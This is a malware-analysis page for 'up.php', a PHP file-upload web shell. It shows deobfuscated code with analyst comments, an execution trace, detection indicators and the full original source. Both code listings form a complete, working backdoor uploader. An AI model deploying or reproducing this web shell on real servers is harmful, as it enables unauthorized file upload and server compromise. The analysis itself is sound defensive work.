PHP Malware Analysis

up.php

md5: e2c6e3d33f78b20c3c25cb77a21e99a2


Screenshot


Attributes

Environment

Files

Input


Deobfuscated PHP code

<?php

// Analyst summary: a minimal file-upload web shell. Everything after the three
// setup calls is gated on a GET parameter named XPLOIT; without it the script
// emits nothing, which matches the empty "Generated HTML code" and the
// three-call execution trace recorded for this sample.
//
// Indicators visible in this listing (useful for log and file-system hunting):
//   - requests whose query string carries a parameter named XPLOIT
//   - multipart POSTs with a file field named FUCK and a submit field named TOD
//   - new files appearing directly under the web server's document root

// Ask PHP to lift the script execution time limit. In the recorded trace this
// call returned FALSE.
set_time_limit(0);
// Switch off PHP error reporting so the notices and warnings raised below are
// not displayed. The trace shows the previous level (22527) being returned.
error_reporting(0);
// NOTE(review): error_log() writes a message to the error log; it is not an
// on/off switch. This call logs the message "0" (trace return value: TRUE), so
// it probably does not do what the author intended. A bare "0" entry in the
// PHP error log may therefore accompany each hit - depends on the host's
// logging configuration, confirm before relying on it.
error_log(0);
// Gate: isset() only checks that the parameter exists, so any value (including
// an empty one) unlocks the uploader. There is no password or other check.
if (isset($_GET["XPLOIT"])) {
    // Banner plus host fingerprint. The escaped bytes are UTF-8 for U+2718
    // marks around the words "SNIPER404 GHOST XPLOIT" written in Unicode
    // mathematical-monospace letters, so a plain-ASCII string search will not
    // match the banner. php_uname() discloses the OS, hostname and kernel
    // details to whoever requests the page.
    echo "<center>\n<h4>\xe2\x9c\x98\xe2\x9c\x98\xe2\x9c\x98 \xf0\x9d\x9a\x82\xf0\x9d\x99\xbd\xf0\x9d\x99\xb8\xf0\x9d\x99\xbf\xf0\x9d\x99\xb4\xf0\x9d\x9a\x81\xf0\x9d\x9f\xba\xf0\x9d\x9f\xb6\xf0\x9d\x9f\xba \xf0\x9d\x99\xb6\xf0\x9d\x99\xb7\xf0\x9d\x99\xbe\xf0\x9d\x9a\x82\xf0\x9d\x9a\x83 \xf0\x9d\x9a\x87\xf0\x9d\x99\xbf\xf0\x9d\x99\xbb\xf0\x9d\x99\xbe\xf0\x9d\x99\xb8\xf0\x9d\x9a\x83 \xe2\x9c\x98\xe2\x9c\x98\xe2\x9c\x98</h4><br><b>" . php_uname() . "</b><br><br>";
    // Upload form. It has no action attribute, so it posts back to the same
    // URL, which keeps the XPLOIT query parameter on the POST request.
    echo "<form method='post' enctype='multipart/form-data'>\n<input type='file' name='FUCK'>\n<input type='submit' name='TOD' value='UPLOAD'>\n</form><br><br>";
    // Destination is the document root joined with the client-supplied file
    // name. The name is used as-is: no extension allow-list, no basename(), no
    // path normalisation. $_FILES is read here even on a plain GET, where the
    // index does not exist; error_reporting(0) above hides the resulting notice.
    $SNIPER404 = $_SERVER['DOCUMENT_ROOT'];
    $GHOST = $_FILES['FUCK']['name'];
    $ANJIR = $SNIPER404 . '/' . $GHOST;
    // The upload is processed only when the submit field TOD is present.
    if (isset($_POST['TOD'])) {
        if (is_writable($SNIPER404)) {
            // Preferred path: write into the document root. copy() is used on
            // the temp file rather than move_uploaded_file(), and "@" silences
            // any warning from a failed copy.
            if (@copy($_FILES['FUCK']['tmp_name'], $ANJIR)) {
                // Success message with a link to the dropped file. The host
                // part comes from the request's Host header and the file name
                // from the upload; both are echoed without HTML escaping. The
                // base already ends in "/", so the link contains "//".
                $XPLOIT = "http://" . $_SERVER['HTTP_HOST'] . "/";
                echo "Sukses mas :) <a href='{$XPLOIT}/{$GHOST}' target='_blank'>{$XPLOIT}/{$GHOST}</a>";
            } else {
                // Failure message (the operator-facing strings appear to be
                // Indonesian: "Sukses" / "Gagal").
                echo "Gagal mas :(";
            }
        } else {
            // Fallback when the document root is not writable: copy to the
            // bare client-supplied name, i.e. a path relative to the script's
            // working directory.
            if (@copy($_FILES['FUCK']['tmp_name'], $GHOST)) {
                echo "Sukses di folder ini mas";
            } else {
                // Failed fallback is silent: nothing is shown to the requester.
                echo "";
            }
        }
    }
}

Execution traces

data/traces/e2c6e3d33f78b20c3c25cb77a21e99a2_trace-1676254916.4386.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:22:22.336401]
1	0	1	0.000192	393464
1	3	0	0.000276	400136	{main}	1		/var/www/html/uploads/up.php	0	0
2	4	0	0.000293	400136	set_time_limit	0		/var/www/html/uploads/up.php	2	1	0
2	4	1	0.000310	400200
2	4	R			FALSE
2	5	0	0.000324	400168	error_reporting	0		/var/www/html/uploads/up.php	3	1	0
2	5	1	0.000338	400208
2	5	R			22527
2	6	0	0.000351	400168	error_log	0		/var/www/html/uploads/up.php	4	1	0
2	6	1	0.000378	400200
2	6	R			TRUE
1	3	1	0.000393	400168
			0.000420	314200
TRACE END   [2023-02-13 00:22:22.336666]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
// Analyst note: these three setup calls are the only function calls that
// appear in the execution trace recorded for this sample.
// Ask PHP to lift the script execution time limit (trace return value: FALSE).
set_time_limit(0);
// Switch off PHP error reporting; the trace shows the previous level, 22527,
// being returned.
error_reporting(0);
// NOTE(review): error_log() writes a message to the error log rather than
// disabling it, so this logs the message "0" (trace return value: TRUE). A bare
// "0" entry in the PHP error log may accompany each hit - depends on the
// host's logging configuration.
error_log(0);
if(isset($_GET["XPLOIT"])){
echo "<center>
<h4>✘✘✘ πš‚π™½π™Έπ™Ώπ™΄πšπŸΊπŸΆπŸΊ π™Άπ™·π™Ύπš‚πšƒ πš‡π™Ώπ™»π™Ύπ™Έπšƒ ✘✘✘</h4><br><b>".php_uname()."</b><br><br>";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='FUCK'>
<input type='submit' name='TOD' value='UPLOAD'>
</form><br><br>";

$SNIPER404 = $_SERVER['DOCUMENT_ROOT'];
$GHOST = $_FILES['FUCK']['name'];
$ANJIR = $SNIPER404.'/'.$GHOST;
if(isset($_POST['TOD'])) {
if(is_writable($SNIPER404)) {
if(@copy($_FILES['FUCK']['tmp_name'], $ANJIR)) {
$XPLOIT = "http://".$_SERVER['HTTP_HOST']."/";
echo "Sukses mas :) <a href='$XPLOIT/$GHOST' target='_blank'>$XPLOIT/$GHOST</a>";
} else {
echo "Gagal mas :(";
}
} else {
if(@copy($_FILES['FUCK']['tmp_name'], $GHOST)) {
echo "Sukses di folder ini mas";
} else {
echo "";
}
}
}
}
?>